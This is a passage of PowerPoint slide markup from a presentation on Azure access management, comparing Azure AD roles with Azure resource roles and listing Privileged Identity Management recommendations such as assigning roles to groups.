                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2745509">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="244316852"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2745509">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1362312579"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="542879">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>Azure AD </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>Roles</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>Azure Resource </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>Roles</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2428282261"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="775542">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>Manage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>access</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t> to Azure Active </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>directory</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>roles</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>Manage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>access</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t> to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>resources</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4028142793"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1473529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" b="1"/>
                        <a:t>Scope</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="nb-NO"/>
                        <a:t>Tenant (Org wide)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="nb-NO"/>
                        <a:t>Admin unit</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="nb-NO"/>
                        <a:t>Or on an individual object (AD Group)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" b="1" dirty="0"/>
                        <a:t>Scope </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>Management </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>group</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>Subscription</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>Resource </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0" err="1"/>
                        <a:t>group</a:t>
                      </a:r>
                      <a:endParaRPr lang="nb-NO" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="285750" indent="-285750">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="nb-NO" dirty="0"/>
                        <a:t>Resource</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2678909338"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{829D21FF-8FF3-4F80-82F5-563AC149777E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7326086" y="1953986"/>
            <a:ext cx="3815443" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>overlap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>No..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>however</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>….</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>elevate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> ‘Access management for Azure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>resources’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> portal. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>Admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>granted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" b="1" dirty="0"/>
              <a:t> administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>subscriptions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>particular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0" err="1"/>
              <a:t>tenant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{781DE67C-CDDE-4D22-8D79-591A359FFC2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762001" y="1592016"/>
            <a:ext cx="3113396" cy="1453281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="523958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4BC0-BB0F-8A27-394B-85D3B888F4E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Privileged Identity Management</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Four recommendations when using PIM</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B433CA6-5B15-467F-A625-A7B8424C7209}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663049" y="2011681"/>
            <a:ext cx="10654984" cy="1658198"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mplement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>preview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial,Sans-Serif" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Assign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>roles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>instead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="1600">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4572" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> persistent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>assignment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>eligible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>member</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Granular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4572" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>existing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="1600" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>group</a:t>
            </a:r>
